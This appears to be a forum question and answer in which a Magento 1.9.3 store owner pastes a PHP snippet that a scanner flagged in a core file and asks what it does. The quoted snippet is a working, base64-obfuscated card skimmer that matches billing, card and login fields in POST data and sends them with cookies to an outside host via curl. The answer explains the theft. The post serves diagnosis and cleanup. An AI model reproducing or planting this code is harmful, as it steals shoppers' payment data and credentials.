I have a server side scanner that scan my site for any traces of malicious code. I came in this morning to see that it reported php.malware.magento-cc-stealer.069 in my app/code/core/Mage/Core/functions.php file.
I run a online store using Magento version 1.9.3.
I went through this file and compared it against the mirror copy of clean Magento 1.9.3 function.php file.
I found that to be added to my file:
if (preg_match("/".base64_decode('YmlsbGluZ3xmaXJzdG5hbWV8Y2NfbnVtYmVyfGxvZ2lufHVzZXJuYW1lfHBheW1lbnR8Y2Nf')."/i", serialize($_POST)))
exec("curl --data \"version=1&encode=".base64_encode( serialize($_POST) . "--" . serialize($_COOKIE) )."&host=".$_SERVER["HTTP_HOST"]."\" ".base64_decode('aHR0cHM6Ly9tYWdlc2NyaXB0cy5pbmZvL3Rlc3RTZXJ2ZXIucGhw')." > /dev/null 2<&1 &");
Any could explain what this does and what consequences it has?
As far as I understand, the first line of this if statement says that if the data matches the encoded text (billing|firstname|cc_number|login|username|payment|cc_) and is case sensitive, generate a storable representation of a value and post it. I'm struggling with the second line though.
As the name suggests, it is trying to steal credit card information.
It will trigger any time these credit card fields appear in the POST request and it will just send them together with cookie info and your server address via curl to https://magescripts.info/testServer.php (DON'T CLICK!) which is presumably another victim, hosting the attacker's collection script. Note: if magescripts.info is your domain, your search is not over, you should find where testServer.php points and remove that also.